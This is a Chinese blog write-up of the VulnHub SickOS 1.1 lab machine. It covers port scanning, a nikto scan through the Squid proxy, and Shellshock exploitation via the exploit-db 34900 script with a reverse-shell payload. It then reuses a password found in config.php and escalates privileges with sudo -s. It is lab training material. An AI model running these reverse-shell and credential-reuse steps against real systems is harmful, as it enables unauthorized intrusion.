OSCP - SickOS:1.1 writeup

本文介绍了在Vulhub的SickOS 1.1环境中,通过nmap进行端口扫描,利用CGI漏洞(CVE-2014-6271)进行exploit,最终通过sudo -s实现提权的完整过程。重点涉及 nikto漏扫、shellshock漏洞和配置文件分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

用到的知识点:

nikto漏扫

cgi漏洞

sudo -s提权

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

地址为10.0.3.143

nmap

nmap -sV -p- 10.0.3.143

漏扫

想了一下突破口肯定不是ssh,就从3128端口入手把,是个代理,那就通过这个代理扫描后面的站点

nikto -h 10.0.3.143 -useproxy http://10.0.3.143:3128

exploit

看到有个shellshock的洞,CVE编号是CVE2014-6271,还可以发现漏洞的路径是/cgi-bin/status

我们打下payload,exp可以这里下载

https://www.exploit-db.com/exploits/34900

python 34900.py payload=reverse rhost=10.0.3.143 lhost=10.0.3.141 lport=555 proxy=10.0.3.143:3128 pages=/cgi-bin/status/

然后就获得了一个不太好使但能用的shell

这期间尝试过直接提权,然后并没有成功,就在想其他方法。

想到这是个站点,就去看看网站目录下都有什么把。

 看到了什么,看到了config.php,来看看文件内容吧

 好东西,接下来看看这台机器的用户都有哪些,

cat /etc/passwd

这些用户名都试一下,看哪个密码是john@123

我猜是sickos,因为机器名字是这个,废话不多说,直接试把

提权

劳动人民的智慧,看下sudo列表

这就是传说中的送分题?

直接sudo -s

over

真over

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值